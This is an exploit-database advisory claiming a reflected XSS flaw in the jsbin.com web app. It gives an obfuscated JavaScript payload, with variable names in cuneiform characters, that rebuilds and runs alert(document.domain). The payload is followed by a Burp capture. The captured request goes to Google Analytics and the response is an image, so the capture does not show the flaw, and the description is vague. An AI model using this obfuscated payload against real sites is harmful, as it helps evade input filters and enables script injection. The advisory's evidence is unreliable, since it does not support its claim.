jsbin-web app - XSS Reflected

2025.07.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Titles: jsbin-web app - XSS Reflected # Author: nu11secur1ty # Date: 07/15/2025 # Vendor: https://jsbin.com/ # Software: https://jsbin.com/?css,js,output # Reference: https://portswigger.net/web-security/cross-site-scripting ## Description: An attacker can execute a malicious JavaScript in the convert function of this app. This is an encoding vulnerability low sanitizing problem. It depends on the scenario; the attacker can try any technique, and when he is successful, he can get or print sensitive information for some other attacks. [+]Exploit: ``` 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+'(alert(document.domain))')() ``` ### Burp ``` GET /collect?v=1&_v=j101&a=1533662127&t=event&_s=6&dl=https%3A%2F%2F34.203.44.8%2F%3Fcss%2Cjs%2Coutput&ul=en-us&de=UTF-8&dt=JS%20Bin%20-%20Collaborative%20JavaScript%20Debugging&sd=24-bit&sr=1536x864&vp=1163x652&je=0&ec=button&ea=run%20with%20js&_u=KGBAgEAjAAAAAGAAI~&jid=&gjid=&cid=1833133753.1750669799&tid=UA-1656750-13&_gid=1639340870.1750669799&z=1616538348 HTTP/2 Host: www.google-analytics.com Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Sec-Ch-Ua-Mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://34.203.44.8/ Accept-Encoding: gzip, deflate, br Priority: i ``` ### Resp: ``` HTTP/2 200 OK Access-Control-Allow-Origin: * Pragma: no-cache X-Content-Type-Options: nosniff Cross-Origin-Resource-Policy: cross-origin Server: Golfe2 Content-Length: 35 Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:163:0 Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=ascnsrsgac:163:0 Report-To: {"group":"ascnsrsgac:163:0","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:163:0"}],} Date: Mon, 23 Jun 2025 06:22:09 GMT Expires: Mon, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Age: 10103 Last-Modified: Sun, 17 May 1998 03:00:00 GMT Content-Type: image/gif Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 GIF89a ``` # Video: [href](https://www.youtube.com/watch?v=hqLnC7UTBhU) # Source: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/jsbin.com) # Buy me a coffee if you are not ashamed: [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) # Source download [href](https://nu11secur1ty.github.io/DownGit/#/home?url=https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/jsbin.com) # Time spent: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top